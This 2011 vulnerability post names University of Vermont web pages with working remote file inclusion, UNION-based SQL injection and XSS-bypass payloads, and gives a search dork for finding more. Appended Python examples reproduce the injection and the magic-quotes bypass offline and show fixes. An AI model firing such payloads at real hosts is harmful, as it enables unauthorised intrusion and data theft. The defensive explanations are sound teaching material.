##############################################################################################
| Title   : University Of Vermont Multiple Vulnerabilities (uvm.edu)
| Author  : Codeine
| Email   : f3codeine[at]yahoo[dot]com
| Twitter : codeinesec
| Date    : 08/10/2011
| Cat     : PHP [RFI, SQLi, XSS]
| URL     : http://uvm.edu/
##############################################################################################
Uname    : Linux tarantula.uvm.edu 2.6.23.17-3.uvm #1 SMP Tue Dec 15 12:08:51 EST 2009 i686
Software : Apache/2.2.3 (Red Hat), PHP/5.3.3
##############################################################################################
The University Of Vermont suffers from multiple web application vulnerabilities: Remote File Inclusion (RFI), SQL Injection (SQLi) and Cross-Site Scripting (XSS).
##############################################################################################

[*] Remote File Inclusion

magicscript.php?Page=Calendar&intro=http://google.com/

This script shows up in almost every directory of every subdomain of uvm.edu, so the same issue is reachable from many entry points, for example:

http://vermontdesigninstitute.org/extension/magicscript.php?Page=Calendar&intro=http://google.com/
http://www.uvm.edu/magicscript.php?Page=Calendar&intro=http://google.com/

Dork: site:uvm.edu inurl:magicscript

Note: the google.com PoC only shows the remote resource being fetched and rendered inside the page. Turning the include into code execution additionally requires allow_url_include to be enabled on the PHP 5.3.3 host (it is off by default) and an attacker-controlled URL that serves PHP code.

_________________________________________________________________________________________________

[*] SQL Injection

http://vmc.snr.uvm.edu/vmc/research/metadata.php?id=-25%20union%20select%20@@version,2,3--

[*] XSS

http://vmc.snr.uvm.edu/vmc/research/searchresults.php (POST)

Magic quotes are active, but easily bypassed with String.fromCharCode. The above is what I sent via POST; it contains "CodeineXss".

_________________________________________________________________________________________________

[*] SQL Injection

http://www.uvm.edu/rsenr/nsrc/projectpages/project.php?id=-69%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89--

_________________________________________________________________________________________________

[*] SQL Injection

http://bol.uvm.edu/tool_feature.php?id=-1%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

All three injections are UNION-based: the negative id (-25, -69, -1) makes the legitimate query return no rows, so the UNION row is what the page renders; the column count (3, 89 and 26 respectively) has to match the original SELECT or the database rejects the query; and @@version in the rendered column both confirms the injection and leaks the MySQL version.

_________________________________________________________________________________________________

Greetz: Hidden Ninja
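Added example (not the advisory's code): the UNION-based pattern behind the three id= PoCs, reproduced offline against an in-memory SQLite table so the column-count step and the @@version leak can be watched without touching the target. The table layout, its single row and the 3-column count are assumptions modelled on the metadata.php payload; the real schema is unknown. SQLite has no @@version, so sqlite_version() stands in for it.

```python
"""
Worked example of the advisory's UNION SELECT injections, run against a
constructed SQLite table (assumption: three columns, like the metadata.php
PoC). Not the advisory's or the target's code.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the table metadata.php?id= reads from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE metadata (id INTEGER, title TEXT, body TEXT)")
    conn.execute("INSERT INTO metadata VALUES (25, 'Sample record', 'constructed body')")
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str):
    """The bug the advisory implies: the raw id is concatenated into the SQL text."""
    sql = f"SELECT id, title, body FROM metadata WHERE id={raw_id}"
    return conn.execute(sql).fetchone()


def hardened_lookup(conn: sqlite3.Connection, raw_id: str):
    """Fix: accept only a bare integer, then bind it as a parameter so the
    database never interprets attacker text as SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError(f"rejected id: {raw_id!r}")
    return conn.execute(
        "SELECT id, title, body FROM metadata WHERE id=?", (int(raw_id),)
    ).fetchone()


def union_payload(base_id: int, ncols: int, expr: str, pos: int) -> str:
    """Build '-<id> UNION SELECT 1,...,<expr>,...,N--' the way the PoCs do:
    the negative id empties the legitimate result set so the UNION row is the
    one rendered, every column carries its ordinal so the rendered field can
    be recognised, and `expr` replaces column `pos` (1-based)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = expr
    return f"-{abs(base_id)} UNION SELECT {','.join(cols)}--"


def count_columns(conn: sqlite3.Connection, max_cols: int = 100):
    """The step behind the 89- and 26-column payloads: grow the UNION until
    the database stops rejecting a column-count mismatch."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, union_payload(25, n, "NULL", 1))
            return n
        except sqlite3.OperationalError:
            continue
    return None


def leak_version(conn: sqlite3.Connection):
    """Run the metadata.php PoC shape against the vulnerable query; the first
    column of the returned row is the database version string."""
    return vulnerable_lookup(conn, union_payload(25, 3, "sqlite_version()", 1))


if __name__ == "__main__":
    db = make_db()
    print("columns:", count_columns(db))
    print("leaked :", leak_version(db))
    try:
        hardened_lookup(db, union_payload(25, 3, "sqlite_version()", 1))
    except ValueError as err:
        print("hardened:", err)
```

The integer check in hardened_lookup is the cheap first line of defence for an id parameter; the parameter binding is what actually removes the injection, and it is needed even where input validation cannot be that strict.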
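Added example (not the advisory's code) for the searchresults.php XSS note: why magic quotes do not stop a String.fromCharCode payload, and what does. The results-page template and the "CodeineXss" marker payloads are constructed for the example; the advisory does not show the exact string that was posted.

```python
"""
Magic quotes versus String.fromCharCode, emulated in Python. The page
template and both payloads are constructed; the real searchresults.php
source is not on the page.
"""
import html

MARKER = "CodeineXss"  # the marker the advisory says the posted payload contained


def magic_quotes(s: str) -> str:
    """Emulates PHP magic_quotes_gpc / addslashes(): a backslash is put in
    front of single quote, double quote, backslash and NUL. Nothing else
    (notably < > ( ) and digits) is touched."""
    out = []
    for c in s:
        if c in "'\"\\":
            out.append("\\" + c)
        elif c == "\x00":
            out.append("\\0")
        else:
            out.append(c)
    return "".join(out)


def from_char_code(s: str) -> str:
    """The bypass: spell the string as JavaScript character codes so the
    payload contains no quote character for addslashes() to escape."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


def quoted_payload(marker: str = MARKER) -> str:
    """Naive payload: magic quotes turn the quotes into \\" and break the JS."""
    return f'<script>alert("{marker}")</script>'


def bypass_payload(marker: str = MARKER) -> str:
    """Quote-free payload that survives magic quotes unchanged."""
    return f"<script>alert({from_char_code(marker)})</script>"


def reflect_vulnerable(user_input: str) -> str:
    """Constructed stand-in for the results page: the input passes through
    magic quotes and is then echoed unencoded into the HTML."""
    return f"<p>Results for: {magic_quotes(user_input)}</p>"


def reflect_fixed(user_input: str) -> str:
    """Fix: encode for the HTML context at output time (htmlspecialchars in
    PHP). This neutralises both payloads whether or not magic quotes run."""
    return f"<p>Results for: {html.escape(user_input, quote=True)}</p>"


def script_survives(page: str, payload: str) -> bool:
    """True when the payload reaches the page byte-for-byte, i.e. the browser
    will execute the <script> element exactly as the attacker sent it."""
    return payload in page


if __name__ == "__main__":
    for name, p in (("quoted", quoted_payload()), ("fromCharCode", bypass_payload())):
        print(f"{name:13} vulnerable page: {script_survives(reflect_vulnerable(p), p)}")
        print(f"{name:13} fixed page     : {script_survives(reflect_fixed(p), p)}")
```

Magic quotes were only ever an SQL-oriented mangling of request data (and were removed in PHP 5.4); they say nothing about the HTML context the data is later written into, which is why the fix has to be output encoding at the point of reflection.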